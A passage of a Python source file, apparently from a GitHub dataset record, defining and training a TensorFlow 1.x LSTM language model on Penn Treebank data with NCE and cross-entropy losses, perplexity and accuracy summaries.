tf.contrib.layers.xavier_initializer()\n self.orthogonal_initializer = tf.orthogonal_initializer()\n\n def define_graph(self):\n filenames = [\"../data/ptb_train_0.tfrecords\"]\n #batch_size = 10\n min_after_dequeue = 1000\n\n filename_queue = tf.train.string_input_producer(\n filenames)\n input_sequence, output_sequence, input_shape, output_shape = self.reader.read_tf_record_file(filename_queue)\n\n input_seq_batch, output_seq_batch, input_shape_batch, output_shape_batch = tf.train.shuffle_batch(\n [input_sequence, output_sequence, input_shape, output_shape], batch_size=self.hparams.batch_size,\n capacity=min_after_dequeue * 3 + 1, min_after_dequeue=min_after_dequeue)\n\n dense_input_seq_batch = tf.sparse_to_dense(sparse_indices=input_seq_batch.indices,\n output_shape=input_seq_batch.dense_shape,\n sparse_values=input_seq_batch.values,\n default_value=0,\n validate_indices=True,\n name=None)\n dens_output_seq_batch = tf.sparse_to_dense(sparse_indices=output_seq_batch.indices,\n output_shape=output_seq_batch.dense_shape,\n sparse_values=output_seq_batch.values,\n default_value=0,\n validate_indices=True,\n name=None)\n\n input_seq_lengths = tf.reshape(input_shape_batch, [self.hparams.batch_size])\n output_seq_lengths = tf.reshape(output_shape_batch, [self.hparams.batch_size])\n\n max_output_length = tf.reduce_max(output_seq_lengths)\n\n self.y = tf.stack([dens_output_seq_batch[i] for i in range(self.hparams.batch_size)])\n\n\n with tf.variable_scope(\"input_layer\") as current_scope:\n self.embedding = tf.get_variable(\"embedding\", [self.vocab_size, self.hparams.number_of_hidden_units],\n dtype=tf.float32,initializer=self.orthogonal_initializer)\n embedded_inputs = [tf.nn.embedding_lookup(self.embedding, dense_input_seq_batch[i]) for i in range(self.hparams.batch_size)]\n if self.mode == tf.contrib.learn.ModeKeys.TRAIN:\n embedded_inputs = tf.nn.dropout(embedded_inputs, self.hparams.keep_prob)\n\n with tf.variable_scope(\"hidden_layer\"):\n self.cell, _ = self._get_lstm_cell()\n tf.logging.info(dense_input_seq_batch)\n tf.logging.info(input_seq_lengths)\n all_states, current_state = tf.nn.dynamic_rnn(inputs=embedded_inputs,\n cell=self.cell,\n sequence_length=input_seq_lengths,\n initial_state=None,\n time_major=False,\n scope=None,\n dtype=tf.float32)\n\n tf.logging.info(all_states)\n self.sequence_predictions = all_states\n tf.logging.info(self.sequence_predictions)\n for sp in tf.unstack(self.sequence_predictions):\n tf.logging.info(sp)\n\n with tf.variable_scope(\"output_projection\"):\n self.projection = tf.get_variable(name=\"output_projection\", shape=[self.hparams.number_of_hidden_units, self.vocab_size],dtype=tf.float32, initializer=self.orthogonal_initializer)\n self.projection_bias = tf.get_variable(name=\"output_projection_bias\", shape=[self.vocab_size],dtype=tf.float32, initializer=tf.zeros_initializer())\n self.projected_seq_predictions = [tf.add(tf.matmul(sp,self.projection),self.projection_bias) for sp in tf.unstack(self.sequence_predictions)]\n\n\n\n\n #cross_ent = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.projected_seq_predictions, labels=self.y)\n #tf.logging.info(cross_ent)\n \n tf.logging.info(self.sequence_predictions[:,-1])\n \n predictions = tf.concat(tf.unstack(self.sequence_predictions),axis=0)\n tf.logging.info(predictions)\n y = tf.concat(tf.unstack(self.y),axis=0)\n with tf.variable_scope(\"loss\"):\n nce_loss = tf.nn.nce_loss(weights=tf.transpose(self.projection),\n biases=self.projection_bias,\n inputs= predictions,#self.sequence_predictions[0],\n labels=tf.expand_dims(y,1),#self.y[0],1),\n num_sampled=20,\n num_classes=10000,\n num_true=1,\n sampled_values=None,\n remove_accidental_hits=False, partition_strategy='div', name='nce_loss')# for y,sp in zip(tf.unstack(self.y),tf.unstack(self.sequence_predictions))]\n\n\n self.train_loss = (tf.reduce_sum(nce_loss) /\n tf.cast(tf.reduce_sum(tf.stack(input_seq_lengths)),dtype='float32'))\n tf.logging.info(self.train_loss)\n tf.summary.scalar(\"nce_loss\", tf.reduce_mean(self.train_loss))\n self.cross_ent_loss = tf.reduce_sum(tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=tf.expand_dims(y,1),\n logits=self.projected_seq_predictions,\n name=\"cross_ent_loss\"))\n tf.summary.scalar(\"cross_ent_loss\", tf.reduce_mean(self.cross_ent_loss))\n self.perplexity = tf.exp(self.cross_ent_loss)\n tf.summary.scalar(\"perplexity\", tf.reduce_mean(self.perplexity))\n correct_prediction = tf.equal(self.y, tf.argmax(self.projected_seq_predictions, 2))\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n tf.summary.scalar(\"accuracy\", self.accuracy)\n\n\n\n def _get_lstm_cell(self):\n cell = tf.contrib.rnn.LSTMBlockCell(self.hparams.number_of_hidden_units, forget_bias=0.0)\n\n # fw_cell = tf.contrib.rnn.ResidualWrapper(fw_cell)\n # bw_cell = tf.contrib.rnn.ResidualWrapper(bw_cell)\n\n if self.mode == tf.contrib.learn.ModeKeys.TRAIN:\n cell = tf.nn.rnn_cell.DropoutWrapper(cell, output_keep_prob=self.hparams.keep_prob)\n\n # elif self.mode == tf.contrib.learn.ModeKeys.EVAL:\n # else: #if self.mode == tf.contrib.learn.ModeKeys.INFER:\n stacked_cell = tf.contrib.rnn.MultiRNNCell([cell] * self.hparams.depth, state_is_tuple=True)\n\n initial_state = stacked_cell.zero_state(self.hparams.batch_size, tf.float32)\n\n return stacked_cell, initial_state\n\n\n def _define_train(self):\n \"\"\"warmup_steps = self.hparams.learning_rate_warmup_steps\n warmup_factor = self.hparams.learning_rate_warmup_factor\n \"\"\"\n \"\"\"print(\" start_decay_step=%d, learning_rate=%g, decay_steps %d, \"\n \"decay_factor %g, learning_rate_warmup_steps=%d, \"\n \"learning_rate_warmup_factor=%g, starting_learning_rate=%g\" %\n (self.hparams.start_decay_step, self.hparams.learning_rate, self.hparams.decay_steps,\n self.hparams.decay_factor, warmup_steps, warmup_factor,\n (self.hparams.learning_rate * warmup_factor ** warmup_steps)))\n \"\"\"\n self.global_step = tf.Variable(0, trainable=False)\n\n\n\n if self.mode == tf.contrib.learn.ModeKeys.TRAIN:\n starter_learning_rate = self.hparams.learning_rate\n self.learning_rate = tf.train.exponential_decay(starter_learning_rate, self.global_step,\n 1000, 0.96, staircase=True)\n #inv_decay = warmup_factor ** (\n # tf.to_float(warmup_steps - self.global_step))\n #self.learning_rate = tf.cond(\n # self.global_step < self.hparams.learning_rate_warmup_steps,\n # lambda: inv_decay * self.learning_rate,\n # lambda: self.learning_rate,\n # name=\"learning_rate_decay_warump_cond\")\n\n if self.hparams.optimizer == \"sgd\":\n self.learning_rate = tf.cond(\n self.global_step < self.hparams.start_decay_step,\n lambda: self.learning_rate,\n lambda: tf.train.exponential_decay(\n self.learning_rate,\n (self.global_step - self.hparams.start_decay_step),\n self.hparams.decay_steps,\n self.hparams.decay_factor,\n staircase=True),\n name=\"learning_rate\")\n self.optimizer = tf.train.GradientDescentOptimizer(self.learning_rate)\n tf.summary.scalar(\"learning_rate\", self.learning_rate)\n elif self.hparams.optimizer == \"adam\":\n assert float(\n self.hparams.learning_rate\n ) <= 0.001, \"! High Adam learning rate %g\" % self.hparams.learning_rate\n self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)\n\n\n\n\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n params = tf.trainable_variables()\n gradients = tf.gradients(\n self.train_loss,\n params,\n colocate_gradients_with_ops=self.hparams.colocate_gradients_with_ops)\n\n clipped_gradients, _ = tf.clip_by_global_norm(gradients, self.hparams.max_gradient_norm)\n #self.update = self.optimizer.minimize(self.train_loss,global_step=self.global_step)\n self.update = self.optimizer.apply_gradients(zip(clipped_gradients, params), global_step=self.global_step)\n\n self.graph_summery = tf.summary.merge_all()\n\n\n def train(self, sess,summary_writer, init=True):\n\n\n start_time = time.time()\n #if init:\n # init_g = tf.global_variables_initializer()\n # init_l = tf.local_variables_initializer()\n # sess.run(init_g)\n # sess.run(init_l)\n # Start populating the filename queue.\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n for epoch in range(self.hparams.number_of_epochs):\n iteration = 0\n while iteration * self.hparams.batch_size < self.hparams.training_size:\n _, train_cost, train_accuracy , graph_summery, global_step= sess.run(\n [self.update, self.train_loss, self.accuracy, self.graph_summery,self.global_step])\n\n summary_writer.add_summary(graph_summery,global_step)\n iteration += 1\n if iteration % 10 == 0:\n print(\"iterations: [%2d] time: %4.4f, loss: %.8f, accuracy: %.8f\" \\\n % (iteration, time.time() - start_time, np.mean(train_cost), train_accuracy))\n\n # if iteration % 1000 == 0:\n # self.save(global_step=self.global_step)\n\n coord.request_stop()\n coord.join(threads)\n\n\n\n","repo_name":"samiraabnar/ContextualWordEmbeddings","sub_path":"src/LSTMLanguageModel.py","file_name":"LSTMLanguageModel.py","file_ext":"py","file_size_in_byte":12166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}